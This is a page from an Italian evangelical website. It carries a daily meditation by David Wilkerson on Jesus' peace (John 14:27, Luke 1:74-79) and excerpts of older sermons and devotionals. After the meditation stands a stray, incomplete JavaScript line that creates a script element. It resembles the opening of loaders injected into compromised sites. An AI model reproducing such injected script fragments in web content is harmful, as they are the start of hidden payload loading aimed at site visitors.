Meditazione del giorno: UN CUORE TURBATO

di  DAVID WILKERSON –   Gesù disse: “Il vostro cuore non sia turbato e non si spaventi” (Giovanni 14:27). Ma il fatto è che molti cristiani hanno un cuore turbato e vivono nella paura. Gesù disse anche nello stesso verso: “Vi lascio la pace, vi do la mia pace”. Tuttavia, pochi credenti possono dire di godere di una costante pace nella mente. Per molti, la pace viene e va, lasciandoli preoccupati, travagliati e vittime dello stress. Ecco cosa profetizzò Zaccaria del futuro Messia: “Per concederci che, liberati dalle mani dei nostri nemici, lo potessimo servire senza paura, in santità e giustizia davanti a lui, tutti i giorni della nostra vita” (Luca 1:74-75). 

Amato, Gesù venne su questa terra e morì per l’uomo peccatore affinché questo potesse camminare con Dio senza paura, godendo della Sua pace tutti i giorni della sua vita.
Nessun timore, solo pace nella mente per tutti i nostri giorni! Ciò include giorni buoni e meno buoni, giorni di sofferenza, tumulto, prova e incertezza. Non importa ciò che attraversiamo, dobbiamo godere sempre della pace. Zaccaria aggiunse queste parole su Gesù: “per illuminare quelli che giacevano nelle tenebre e nell’ombra della morte, per guidare i nostri passi nella via della pace” (verso 79). Stava dicendo che Gesù avrebbe guidato ogni Suo figlio nel cammino della pace, non nell’irrequietezza, il vuoto o il timore.Gesù è il Principe della Pace. Alla Sua nascita, gli angeli cantarono, “Pace in terra!” Il Suo vangelo viene definito il vangelo della pace ed Egli promise di Sé stesso, “abbiate pace in Me” (Giovanni 16:33). La pace è tutto ciò di cui tratta l’evangelo. “La parola che egli ha dato ai figli d’Israele, annunziando la pace per mezzo di Gesù Cristo” (Atti 10:36).In questo mondo affronteremo tribolazione, persecuzione e prove tremende – “combattimenti di fuori, paure di dentro”, secondo Paolo (2 Corinzi 7:5). Saremo tentati, soffriremo per la causa di Cristo e i venti dell’avversità cercheranno di abbattere la casa della fede che edifichiamo sulla Rocca della nostra salvezza – Gesù – ma cammineremo in pace a motivo di Lui.

var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Calvario

di John Charles Ryle  –  Probabilmente saprete che il Calvario era un posto poco fuori Gerusalemme, dove il Signore Gesù Cristo, il Figlio di Dio, fu crocifisso. Sul Calvario non sappiamo altro che questo. Ho intitolato questo sermone “Calvario” perché voglio parlarvi delle sofferenze e della crocifissione di Cristo. Temo infatti che ci sia molta ignoranza, nel seno del popolo di Dio, sul soggetto delle sofferenze di Gesù …
Leggi Tutto

IL SERPENTE DI RAME

«E, come Mosè innalzò il serpente nel deserto, così bisogna che il Figlio dell’uomo sia innalzato, affinché chiunque crede in lui abbia vita eterna. Perché Dio ha tanto amato il mondo, che ha dato il suo unigenito Figlio, affinché chiunque crede in lui non perisca, ma abbia vita eterna. Infatti Dio non ha mandato suo Figlio nel mondo per giudicare il mondo, ma perché il mondo sia salvato per mezzo …
Leggi Tutto

Una promessa per oggi: DIO NON ABBANDONA COLORO CHE LO CERCANO

Salmo 9:10 – Quelli che conoscono il tuo nome confideranno in te, perché, o SIGNORE, tu non abbandoni quelli che ti cercano.  –   …
Leggi Tutto

Una promessa per oggi: Io sono un padre per gli orfani e difendo la causa delle vedove.

Dio è padre degli orfani e difensore delle vedove nella sua santa dimora; (Salmo 68:5) È confortante sapere che Dio promette di essere un padre per l’orfano. In questa generazione di orfani nella quale viviamo, c’è un grande bisogno come non mai dell’amore di un padre. Con quasi il 50% delle famiglie, nei paesi occidentali, finite in divorzio, c’è un grido che oggi ripete quello dei discepoli di Gesù …
Leggi Tutto

Predicazione Domenica 22 Settembre 2013

Pastore AGOSTINO MASDEA “Egli ha dato…”  –  Giovanni 1:12 …
Leggi Tutto

Ehi Dio! Ci sei?

di Frank Foglio  –  Bellissima testimonianza di una famiglia italiana emigrata in America   –  Era 1925 la mia famiglia; la famiglia Foglio, italiani emigrati in America del nord in Pennsylvania, ci trasferimmo dalla nostra abitazione in una grande fattoria, con novantacinque acri con una grande casa colonica. Un giorno, papà fece una proposta a un uomo di colore, un certo Slim Hopper. Che se avrebbe arato la nostra terra …
Leggi Tutto

ED ORA CHE INDUGI....LEVATI!

di Agostino Masdea   –  Or un certo Anania, uomo pio secondo la legge, al quale tutti i Giudei che abitavan quivi rendevan buona testimonianza, venne a me; e standomi vicino, mi disse: Fratello Saulo, ricupera la vista. Ed io in quell’istante ricuperai la vista, e lo guardai. Ed egli disse: L’Iddio de’ nostri padri ti ha destinato a conoscer la sua volontà, e a vedere il Giusto, e a …
Leggi Tutto

SETTE PASSI PER TROVARE DIO

di William Booth  –  Lo scritto How to find God di William Booth, fondatore dell’Esercito della Salvezza, presenta la visione di un uomo che per tutta la vita ha amato Dio profondamente. Booth ha amato, oltre Dio, anche gli altri, continuando ad adoperarsi affinché quanti, vivendo nelle tenebre, nella difficoltà e nel peccato, e che avevano bisogno di conoscere Dio, potessero incontrarLo personalmente. Anche oggi per chiunque è possibile nutrire il santo desiderio …
Leggi Tutto

Dai nostri Culti